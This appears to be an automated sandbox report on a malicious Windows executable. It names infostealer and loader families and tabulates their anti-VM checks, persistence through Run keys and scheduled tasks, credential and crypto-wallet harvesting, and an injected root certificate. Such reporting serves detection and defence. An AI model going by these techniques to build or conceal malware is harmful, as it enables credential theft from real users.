Analysis Overview
SHA256
4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456
Threat Level: Known bad
The file 4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456 was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
ZharkBot
Stealc
CryptBot
RedLine
Amadey
RedLine payload
Detects ZharkBot payload
Lumma Stealer, LummaC
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Credentials from Password Stores: Credentials from Web Browsers
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Reads data files stored by FTP clients
Checks computer location settings
Checks BIOS information in registry
Unsecured Credentials: Credentials In Files
Drops startup file
Indirect Command Execution
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
Identifies Wine through registry keys
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Enumerates processes with tasklist
Drops file in Windows directory
Program crash
Unsigned PE
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Enumerates system info in registry
Suspicious use of SendNotifyMessage
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Modifies system certificate store
Suspicious use of WriteProcessMemory
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-09-07 14:44
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-07 14:44
Reported
2024-09-07 14:46
Platform
win10v2004-20240802-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Amadey
CryptBot
Detects ZharkBot payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Lumma Stealer, LummaC
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3860 created 3468 | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | C:\Windows\Explorer.EXE |
| PID 3860 created 3468 | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | C:\Windows\Explorer.EXE |
ZharkBot
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zSA60F.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000243001\runtime.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000300001\runtime.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSA60F.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Lighter Tech\runtime.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\filename.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Indirect Command Execution
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Amadeus.exe = "C:\\Users\\Admin\\1000238002\\Amadeus.exe" | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Subsystem Framework = "\"C:\\ProgramData\\Microsoft Subsystem Framework\\winmsbt.exe\"" | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\ChipsCounted | C:\Users\Admin\AppData\Local\Temp\filename.exe | N/A |
| File opened for modification | C:\Windows\MaximizeRepresentative | C:\Users\Admin\AppData\Local\Temp\filename.exe | N/A |
| File opened for modification | C:\Windows\ChristmasHerbal | C:\Users\Admin\AppData\Local\Temp\filename.exe | N/A |
| File opened for modification | C:\Windows\LadySquare | C:\Users\Admin\AppData\Local\Temp\filename.exe | N/A |
| File opened for modification | C:\Windows\PrerequisiteCents | C:\Users\Admin\AppData\Local\Temp\filename.exe | N/A |
| File created | C:\Windows\Tasks\bDxiLwhXhHymEtvbIE.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\1000238002\Amadeus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\tFtzeaz0BT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\egKXRnvmfw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000296001\Channel3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\07DD4GXsP3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSA60F.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSA469.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\NPqcpcuVNB.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000296001\Channel3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000296001\Channel3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zSA60F.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zSA60F.tmp\Install.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe | N/A |
